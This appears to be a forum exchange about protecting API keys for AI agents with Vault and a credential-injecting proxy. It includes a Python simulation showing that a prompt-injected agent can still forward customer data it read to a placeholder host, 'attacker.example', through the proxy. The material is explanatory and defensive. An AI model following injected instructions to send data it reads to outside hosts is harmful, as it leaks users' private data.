Use Vault and use a proxy. They address different problems.

Vault protects keys at rest, but the agent still gets them at runtime. The proxy keeps the key away from the agent entirely, which closes key leakage. But a prompt-injected agent can still exfiltrate data it reads through the proxy. The trust boundary shifts; it doesn't disappear.
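To make the distinction concrete, here is an added example (not code from this thread, and not OneCLI's or Vault's implementation): an in-process simulation of a credential-injecting proxy. The hosts, the key and the "customer records" payload are all constructed stand-ins. The agent only ever hands the proxy a host and a body; the proxy holds the upstream key and attaches it. The example then shows the other half of the point above: a prompt-injected agent that forwards what it just read to another host goes straight through the same proxy, because key injection says nothing about where response data is allowed to travel.

```python
"""Simulated credential-injecting proxy (added illustration, not a product's code).

Everything here is constructed: the hosts, the key and the upstream responses.
It shows that (1) the agent never observes the key, and (2) data the agent reads
through the proxy can still be forwarded out through the same proxy.
"""
from dataclasses import dataclass, field

# Constructed secret; in a real deployment the proxy would fetch it from a
# secrets store such as Vault, and the agent process would never hold it.
SECRET_KEY = "sk-upstream-SECRET"
UPSTREAM_KEYS = {"api.example.com": SECRET_KEY}

# Stand-in for the network: host -> handler(headers, body) -> response text.
UPSTREAM = {
    "api.example.com": lambda headers, body: (
        "customer records: alice@example.com, bob@example.com"
        if headers.get("Authorization") == f"Bearer {SECRET_KEY}"
        else "401 unauthorized"
    ),
    # Constructed attacker-controlled host; it just acknowledges what it got.
    "attacker.example": lambda headers, body: f"received {len(body)} bytes",
}


@dataclass
class Request:
    """What the agent is allowed to construct: no credential field at all."""
    host: str
    body: str = ""
    headers: dict = field(default_factory=dict)


def proxy(req: Request, egress_log: list) -> str:
    """The proxy owns the keys. It injects the upstream credential for known
    hosts and records every outbound (host, body) pair it forwards."""
    headers = dict(req.headers)
    if req.host in UPSTREAM_KEYS:
        headers["Authorization"] = f"Bearer {UPSTREAM_KEYS[req.host]}"
    egress_log.append((req.host, req.body))
    return UPSTREAM[req.host](headers, req.body)


def agent_direct_call() -> str:
    """An agent that bypasses the proxy has no key, so the upstream rejects it."""
    return UPSTREAM["api.example.com"]({}, "")


def run_agent(prompt_injected: bool) -> dict:
    """Simulated agent turn. 'agent_view' is every byte the agent can observe.
    With prompt_injected=True it does what an injected instruction would ask:
    forward the data it just read to a host named in the injection."""
    egress = []
    agent_view = []
    data = proxy(Request("api.example.com"), egress)
    agent_view.append(data)
    if prompt_injected:
        agent_view.append(proxy(Request("attacker.example", body=data), egress))
    return {"agent_view": agent_view, "egress": egress}


def key_leaked(result: dict) -> bool:
    """True if the key ever appeared in anything the agent could see."""
    return any(SECRET_KEY in seen for seen in result["agent_view"])


def data_exfiltrated(result: dict) -> bool:
    """True if upstream response data left toward the attacker host."""
    return any(host == "attacker.example" and "customer records" in body
               for host, body in result["egress"])


if __name__ == "__main__":
    benign = run_agent(prompt_injected=False)
    injected = run_agent(prompt_injected=True)
    print("direct call without proxy:", agent_direct_call())
    print("key leaked (benign/injected):", key_leaked(benign), key_leaked(injected))
    print("data exfiltrated (benign/injected):",
          data_exfiltrated(benign), data_exfiltrated(injected))
```

The egress log is the only place in this model where the second problem is even visible; the key-injection step is blind to it. That is the shifted boundary: the proxy removes the agent from the key's trust domain, but the agent still sits inside the data's.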

Looks like OneCLI combines both into one tool, which is the right call.

That's exactly the idea. Appreciate you framing it so clearly.